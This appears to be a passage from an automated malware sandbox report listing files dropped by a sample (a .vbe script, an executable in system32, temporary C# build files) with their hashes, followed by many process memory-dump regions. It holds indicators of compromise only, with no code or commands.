                                                • C:\blockComAgentdll\l2A594olLEJWUEUfw4GfnauDbYxQl.vbe
                                                  Filesize

                                                  211B

                                                  MD5

                                                  386552a2a95b01f9b62bbf076f55204a

                                                  SHA1

                                                  4b202d016dc86a72837fdcb080caea7b8761842c

                                                  SHA256

                                                  be3ca473daa12562ac27843de069cca900d4413f08703b0cefee87303b8ec414

                                                  SHA512

                                                  dbba55a57db75cb351606a7dbc89cd0cf37dd333fa7456f94c6c2f9fd0480af28a27c29ca411cc5745c9929a92222123f770a870b046a84b25b23f4417ec62c4

                                                  Download Submit

                                                • C:\windows\system32\8zj1cq.exe
                                                  Filesize

                                                  4KB

                                                  MD5

                                                  e66d686c1dfbf99b4059ab3faa2e017d

                                                  SHA1

                                                  11b2df3c8490ccf96073cf5f31465bd5ee0382d5

                                                  SHA256

                                                  59e3f5ae71bb569f43fb501a9fee3c37c83a78f147ad00b8011482862afecd12

                                                  SHA512

                                                  41e8c66db7e7e696df933164a9364ea3fa9b87b19c3f84ef1b8de61e30cd6b2c756f806de71b03e3176f9de763ad6cf8d58109cb3405bb1e136682028c896860

                                                  Download Submit

                                                • \??\c:\Users\Admin\AppData\Local\Temp\qlgu50dl\qlgu50dl.0.cs
                                                  Filesize

                                                  391B

                                                  MD5

                                                  8396153b87871a1de1bbdb5bef937144

                                                  SHA1

                                                  1524ae8dd97fbf5936731f527909c4cd2aa229f3

                                                  SHA256

                                                  b05dd01f70dfc8dc242dd4973ed57a8645128c713fea5472bf4f6207f10c0c78

                                                  SHA512

                                                  e36fd4a2d21730a9ec643aee7f9cc6937822bc25914bdaa5d3ac0b97a7f908394e6c23e49ee2e8ba7093210886896a86a71878b315256879230b3ddabfad398b

                                                  Download Submit

                                                • \??\c:\Users\Admin\AppData\Local\Temp\qlgu50dl\qlgu50dl.cmdline
                                                  Filesize

                                                  235B

                                                  MD5

                                                  161d4b04963a1b00f04c2e521a2c7b1f

                                                  SHA1

                                                  c0efb70177bd30cd825fa1af86575bcae8e8f974

                                                  SHA256

                                                  d55c9f11f3e200b74148cb0c0fe13fa200f8a7d86aa02146a6378f8d65b23f4a

                                                  SHA512

                                                  705a41b8ceeac59f214d5c0893a1b13830caf5956116ad84267a4ed1e5f790e5b84d8bdbcc6d739bd0937646b0a1eea9b057dd62640f24a326b083d42b6417a1

                                                  Download Submit

                                                • \??\c:\Windows\System32\CSCED94E796E85444428CB0B85CDF9B85C9.TMP
                                                  Filesize

                                                  1KB

                                                  MD5

                                                  d544bac668d308d2aba58ded2c13d82d

                                                  SHA1

                                                  e5dd50ef24d5c16629092f9290661a92387773b3

                                                  SHA256

                                                  84b05d56c45fd0382410fcd59e16aeef467ed0a455595dda88386dd5c87d7a02

                                                  SHA512

                                                  0826de2bc95d93dde2c540d2d768a0188481ee88f1da79f9c7d70d7ccd3c8715b8f1d62053f84d14f19e4d2b0a13e67084d970a158464e6223e340eb0733e1b0

                                                  Download Submit

                                                • memory/232-144-0x000002A19EF90000-0x000002A19EF91000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/232-218-0x000002A19EF90000-0x000002A19EF91000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/232-148-0x000002A19EF90000-0x000002A19EF91000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/232-89-0x000002A19EF90000-0x000002A19EF91000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/1456-641-0x0000000000F50000-0x0000000001140000-memory.dmp

                                                  Filesize

                                                  1.9MB

                                                  Download

                                                • memory/1456-677-0x00000000019C0000-0x00000000019CC000-memory.dmp

                                                  Filesize

                                                  48KB

                                                  Download

                                                • memory/1456-661-0x00000000019A0000-0x00000000019AE000-memory.dmp

                                                  Filesize

                                                  56KB

                                                  Download

                                                • memory/1456-680-0x00000000019D0000-0x00000000019D8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                  Download

                                                • memory/1660-743-0x0000000000BB0000-0x0000000000BB8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                  Download

                                                • memory/4756-360-0x0000000000730000-0x000000000073C000-memory.dmp

                                                  Filesize

                                                  48KB

                                                  Download

                                                • memory/4756-365-0x0000000000F30000-0x0000000000F42000-memory.dmp

                                                  Filesize

                                                  72KB

                                                  Download

                                                • memory/4756-366-0x000000001B250000-0x000000001B28C000-memory.dmp

                                                  Filesize

                                                  240KB

                                                  Download

                                                • memory/4776-756-0x0000000009A60000-0x0000000009B6A000-memory.dmp

                                                  Filesize

                                                  1.0MB

                                                  Download

                                                • memory/4776-625-0x0000000006B60000-0x0000000006B70000-memory.dmp

                                                  Filesize

                                                  64KB

                                                  Download

                                                • memory/4776-624-0x00000000069A0000-0x00000000069B8000-memory.dmp

                                                  Filesize

                                                  96KB

                                                  Download

                                                • memory/4776-622-0x00000000061E0000-0x000000000622E000-memory.dmp

                                                  Filesize

                                                  312KB

                                                  Download

                                                • memory/4776-626-0x0000000006D40000-0x0000000006F02000-memory.dmp

                                                  Filesize

                                                  1.8MB

                                                  Download

                                                • memory/4776-637-0x0000000008CB0000-0x0000000009004000-memory.dmp

                                                  Filesize

                                                  3.3MB

                                                  Download

                                                • memory/4776-642-0x0000000009090000-0x00000000090DC000-memory.dmp

                                                  Filesize

                                                  304KB

                                                  Download

                                                • memory/4776-678-0x000000000A3B0000-0x000000000A453000-memory.dmp

                                                  Filesize

                                                  652KB

                                                  Download

                                                • memory/4776-300-0x0000000000400000-0x000000000041E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                  Download

                                                • memory/4776-699-0x000000000A8E0000-0x000000000A8F1000-memory.dmp

                                                  Filesize

                                                  68KB

                                                  Download

                                                • memory/4776-705-0x000000000A4C0000-0x000000000A4D4000-memory.dmp

                                                  Filesize

                                                  80KB

                                                  Download

                                                • memory/4776-732-0x0000000007160000-0x000000000716A000-memory.dmp

                                                  Filesize

                                                  40KB

                                                  Download

                                                • memory/4776-753-0x000000000B3D0000-0x000000000B9E8000-memory.dmp

                                                  Filesize

                                                  6.1MB

                                                  Download

                                                • memory/4776-754-0x00000000098E0000-0x00000000098F2000-memory.dmp

                                                  Filesize

                                                  72KB

                                                  Download

                                                • memory/4776-755-0x0000000009900000-0x000000000993C000-memory.dmp

                                                  Filesize

                                                  240KB

                                                  Download

                                                • memory/5204-447-0x0000000002EC0000-0x0000000002EDC000-memory.dmp

                                                  Filesize

                                                  112KB

                                                  Download

                                                • memory/5204-452-0x00000000013B0000-0x00000000013BE000-memory.dmp

                                                  Filesize

                                                  56KB

                                                  Download

                                                • memory/5204-445-0x00000000013A0000-0x00000000013AE000-memory.dmp

                                                  Filesize

                                                  56KB

                                                  Download

                                                • memory/5204-442-0x0000000000BE0000-0x0000000000BE8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                  Download

                                                • memory/5204-448-0x0000000002F30000-0x0000000002F80000-memory.dmp

                                                  Filesize

                                                  320KB

                                                  Download

                                                • memory/5204-450-0x0000000002EE0000-0x0000000002EF8000-memory.dmp

                                                  Filesize

                                                  96KB

                                                  Download

                                                • memory/5204-454-0x0000000002D70000-0x0000000002D7C000-memory.dmp

                                                  Filesize

                                                  48KB

                                                  Download

                                                • memory/5204-443-0x000000001B750000-0x000000001B822000-memory.dmp

                                                  Filesize

                                                  840KB

                                                  Download

                                                • memory/5236-91-0x00000224B4C00000-0x00000224B4C22000-memory.dmp

                                                  Filesize

                                                  136KB

                                                  Download

                                                • memory/5248-569-0x0000000007730000-0x0000000007762000-memory.dmp

                                                  Filesize

                                                  200KB

                                                  Download

                                                • memory/5248-580-0x0000000007770000-0x0000000007813000-memory.dmp

                                                  Filesize

                                                  652KB

                                                  Download

                                                • memory/5248-570-0x0000000073DC0000-0x0000000073E0C000-memory.dmp

                                                  Filesize

                                                  304KB

                                                  Download

                                                • memory/5248-592-0x0000000007A80000-0x0000000007A91000-memory.dmp

                                                  Filesize

                                                  68KB

                                                  Download

                                                • memory/5248-594-0x0000000007AC0000-0x0000000007AD4000-memory.dmp

                                                  Filesize

                                                  80KB

                                                  Download

                                                • memory/5348-644-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-649-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-653-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-652-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-643-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-655-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-650-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-645-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-654-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5348-651-0x00000236EEFE0000-0x00000236EEFE1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5720-715-0x0000000074BB0000-0x0000000074BFC000-memory.dmp

                                                  Filesize

                                                  304KB

                                                  Download

                                                • memory/5720-725-0x0000000006DC0000-0x0000000006E63000-memory.dmp

                                                  Filesize

                                                  652KB

                                                  Download

                                                • memory/5720-729-0x0000000007070000-0x0000000007081000-memory.dmp

                                                  Filesize

                                                  68KB

                                                  Download

                                                • memory/5720-730-0x00000000070B0000-0x00000000070C4000-memory.dmp

                                                  Filesize

                                                  80KB

                                                  Download

                                                • memory/5796-496-0x0000000000400000-0x000000000041E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                  Download

                                                • memory/5796-776-0x0000000000400000-0x000000000041E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                  Download

                                                • memory/5824-265-0x000002CCD81B0000-0x000002CCD81B1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5824-194-0x000002CCD81B0000-0x000002CCD81B1000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5844-490-0x0000016693260000-0x0000016693D21000-memory.dmp

                                                  Filesize

                                                  10.8MB

                                                  Download

                                                • memory/5912-775-0x000002BBF2C50000-0x000002BBF2C51000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5912-431-0x000002BBF2C50000-0x000002BBF2C51000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5912-656-0x000002BBF2C50000-0x000002BBF2C51000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5912-319-0x000002BBF2C50000-0x000002BBF2C51000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5912-773-0x000002BBF2C50000-0x000002BBF2C51000-memory.dmp

                                                  Filesize

                                                  4KB

                                                  Download

                                                • memory/5928-335-0x0000000005D10000-0x0000000005D18000-memory.dmp

                                                  Filesize

                                                  32KB

                                                  Download

                                                • memory/5928-331-0x0000000005670000-0x0000000005682000-memory.dmp

                                                  Filesize

                                                  72KB

                                                  Download

                                                • memory/5928-336-0x0000000006320000-0x0000000006342000-memory.dmp

                                                  Filesize

                                                  136KB

                                                  Download

                                                • memory/5928-476-0x00000000097C0000-0x0000000009863000-memory.dmp

                                                  Filesize

                                                  652KB

                                                  Download

                                                • memory/5928-475-0x00000000097A0000-0x00000000097BE000-memory.dmp

                                                  Filesize

                                                  120KB

                                                  Download

                                                • memory/5928-477-0x0000000009B70000-0x0000000009B7A000-memory.dmp

                                                  Filesize

                                                  40KB

                                                  Download

                                                • memory/5928-397-0x0000000006C10000-0x0000000007238000-memory.dmp

                                                  Filesize

                                                  6.2MB

                                                  Download

                                                • memory/5928-415-0x0000000006A70000-0x0000000006A8A000-memory.dmp

                                                  Filesize

                                                  104KB

                                                  Download

                                                • memory/5928-425-0x0000000006AD0000-0x0000000006B06000-memory.dmp

                                                  Filesize

                                                  216KB

                                                  Download

                                                • memory/5928-426-0x00000000078C0000-0x0000000007F3A000-memory.dmp

                                                  Filesize

                                                  6.5MB

                                                  Download

                                                • memory/5928-427-0x0000000007240000-0x00000000072D6000-memory.dmp

                                                  Filesize

                                                  600KB

                                                  Download

                                                • memory/5928-430-0x0000000007330000-0x000000000737A000-memory.dmp

                                                  Filesize

                                                  296KB

                                                  Download

                                                • memory/5928-429-0x0000000006B70000-0x0000000006B8E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                  Download

                                                • memory/5928-428-0x0000000006BA0000-0x0000000006C06000-memory.dmp

                                                  Filesize

                                                  408KB

                                                  Download

                                                • memory/5928-333-0x0000000005CF0000-0x0000000005CF8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                  Download

                                                • memory/5928-334-0x0000000005D00000-0x0000000005D0A000-memory.dmp

                                                  Filesize

                                                  40KB

                                                  Download

                                                • memory/5928-495-0x0000000009D50000-0x0000000009D58000-memory.dmp

                                                  Filesize

                                                  32KB

                                                  Download

                                                • memory/5928-332-0x0000000005CE0000-0x0000000005CE8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                  Download

                                                • memory/5928-494-0x000000000A370000-0x000000000A38A000-memory.dmp

                                                  Filesize

                                                  104KB

                                                  Download

                                                • memory/5928-301-0x00000000008D0000-0x0000000000BD2000-memory.dmp

                                                  Filesize

                                                  3.0MB

                                                  Download

                                                • memory/5928-318-0x00000000057C0000-0x0000000005852000-memory.dmp

                                                  Filesize

                                                  584KB

                                                  Download

                                                • memory/5928-493-0x0000000009D00000-0x0000000009D14000-memory.dmp

                                                  Filesize

                                                  80KB

                                                  Download

                                                • memory/5928-492-0x0000000009CF0000-0x0000000009CFE000-memory.dmp

                                                  Filesize

                                                  56KB

                                                  Download

                                                • memory/5928-433-0x0000000007F40000-0x0000000008294000-memory.dmp

                                                  Filesize

                                                  3.3MB

                                                  Download

                                                • memory/5928-434-0x00000000077A0000-0x0000000007806000-memory.dmp

                                                  Filesize

                                                  408KB

                                                  Download

                                                • memory/5928-317-0x0000000005D70000-0x0000000006314000-memory.dmp

                                                  Filesize

                                                  5.6MB

                                                  Download

                                                • memory/5928-316-0x0000000005690000-0x00000000056EC000-memory.dmp

                                                  Filesize

                                                  368KB

                                                  Download

                                                • memory/5928-315-0x00000000053F0000-0x00000000053FE000-memory.dmp

                                                  Filesize

                                                  56KB

                                                  Download

                                                • memory/5928-483-0x0000000009CC0000-0x0000000009CD1000-memory.dmp

                                                  Filesize

                                                  68KB

                                                  Download

                                                • memory/5928-437-0x0000000008570000-0x00000000085BC000-memory.dmp

                                                  Filesize

                                                  304KB

                                                  Download

                                                • memory/5928-436-0x0000000007840000-0x0000000007862000-memory.dmp

                                                  Filesize

                                                  136KB

                                                  Download

                                                • memory/5984-201-0x000001427C840000-0x000001427C888000-memory.dmp

                                                  Filesize

                                                  288KB

                                                  Download

                                                • memory/5992-204-0x0000022098770000-0x00000220987B8000-memory.dmp

                                                  Filesize

                                                  288KB

                                                  Download

                                                • memory/6000-393-0x000000001A140000-0x000000001A24A000-memory.dmp

                                                  Filesize

                                                  1.0MB

                                                  Download

                                                • memory/6092-364-0x000001E966F20000-0x000001E966F68000-memory.dmp

                                                  Filesize

                                                  288KB

                                                  Download

                                                • memory/6136-367-0x00000234C8E80000-0x00000234C8EC8000-memory.dmp

                                                  Filesize

                                                  288KB

                                                  Download